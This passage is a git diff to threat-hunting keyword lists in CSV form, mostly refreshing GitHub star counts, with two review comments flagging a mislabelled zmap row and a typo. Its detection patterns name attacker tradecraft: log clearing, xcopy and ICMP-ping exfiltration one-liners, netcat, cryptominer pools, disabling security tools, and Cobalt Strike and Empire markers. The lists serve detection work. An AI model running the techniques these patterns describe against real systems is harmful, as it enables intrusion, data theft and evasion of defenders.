TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*wevtutil cl *","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. 
This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" -"*whoami*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" -"*whoami.exe* /groups*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. 
or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" -"*WinRing0*WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*whoami*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*whoami.exe* /groups*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. 
or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*WinRing0*WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*winrs -r:*whoami*","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*Wireshark*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wireshark*.deb*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1139,20 +1179,20 @@ "*wss://*.tunnels.api.visualstudio.com/api/v1/Connect/*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*www.ip-api.com*","greyware_tool_keyword","ip-api.com","get public ip address","T1016 - T1071.001","TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","1","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*xcopy c:\* \\*\c$*","greyware_tool_keyword","xcopy","command abused by attackers - exfiltraiton to remote host with xcopy","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*xmrig-*-bionic-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-focal-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" 
-"*xmrig-*-freebsd-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-linux-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-linux-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-macos-arm64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-macos-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-msvc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised 
machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig.exe -*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrpool.eu:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-bionic-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-focal-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-freebsd-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-linux-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-linux-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-macos-arm64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-macos-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-msvc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig.exe -*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrpool.eu:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*xxd -p -c 4 /* | while read line* do ping -c 1 -p *","greyware_tool_keyword","xxd","ICMP Tunneling One Liner","T1090 - T1002 - T1016","TA0011 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*zenmap.exe*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*zmap -*","greyware_tool_keyword","nmap","ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. 
ZMaps sister project that performs stateful application-layer handshakes.","T1046 - T1065 - T1210.002 - T1095 - T1040","TA0002 - TA0007 - TA0008 - TA0011 - TA0001","N/A","N/A","Vulnerability scanner","https://github.com/zmap/zmap","1","0","greyware tool - risks of False positive !","N/A","10","5009","887","2023-09-26T15:13:35Z","2013-01-23T01:30:09Z" +"*zmap -*","greyware_tool_keyword","nmap","ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. 
ZMaps sister project that performs stateful application-layer handshakes.","T1046 - T1065 - T1210.002 - T1095 - T1040","TA0002 - TA0007 - TA0008 - TA0011 - TA0001","N/A","N/A","Vulnerability scanner","https://github.com/zmap/zmap","1","0","greyware tool - risks of False positive !","N/A","10","5011","887","2023-09-26T15:13:35Z","2013-01-23T01:30:09Z" "capinfos -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "captype -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "chkconfig off ip6tables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
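Review bot: The `"*zmap -*"` row on the new side still has `"nmap"` in the `metadata_tool` column, although its description and `metadata_link` (`https://github.com/zmap/zmap`) are for ZMap. This commit only refreshes the star count on that row. An alert built from the row would be attributed to the wrong tool during triage, and any per-tool filter on `nmap` would also pull in ZMap hits. I would set the third field to `"zmap"`. The row also maps to T1065, which ATT&CK has deprecated in favour of T1571, so the technique list is worth rechecking in the same pass.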
@@ -1170,7 +1210,7 @@ "Get-NetGroup -FullData*","greyware_tool_keyword","powershell","Find groups in the current domain (PowerView)","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "ldapsearch -h * -x*","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "nc -vz *","greyware_tool_keyword","netcat","Netcat is a featured networking utility which reads and writes data across network connections. using the TCP/IP protocol It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time. it is a feature-rich network debugging and exploration tool. since it can create almost any kind of connection you would need and has several interesting built-in capabilities","T1043 - T1052 - T1071 - T1095 - T1132 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","http://netcat.sourceforge.net/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"nmap *","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8299","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"nmap *","greyware_tool_keyword","nmap","A very common tool. 
Network host vuln and port detector.","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" "rawshark -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "rpcclient -*","greyware_tool_keyword","rpcclient","tool for executing client side MS-RPC functions","T1021.006 - T1049","TA0002 - TA0009","N/A","N/A","Lateral movement","https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","1","0","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "schkconfig off cbdaemon","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" diff --git a/offensive_tool_keyword.csv b/offensive_tool_keyword.csv index 348cc0869..7ceef7cc0 100644 --- a/offensive_tool_keyword.csv +++ b/offensive_tool_keyword.csv 
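Review bot: The context row `"schkconfig off cbdaemon"` at the end of this hunk looks like a typo for `chkconfig off cbdaemon`. The comparable row in the preceding hunk is `"chkconfig off ip6tables"`. The keyword has no wildcard, so as written it presumably never matches the real command and the defense-evasion case it describes goes undetected. The commit leaves the row untouched. I would change the first field to `"chkconfig off cbdaemon"`.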
@@ -1,70 +1,70 @@ "keyword","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at" "* - Sensitive Accounts.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "* - ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"* $exploit_oneliner*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"* $FodHelperPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 
- Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* $lse_find_opts *","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"* $payload_oneliner *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"* * 0x* - HOOK DETECTED*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process 
indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* $exploit_oneliner*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"* $FodHelperPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* $lse_find_opts *","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - 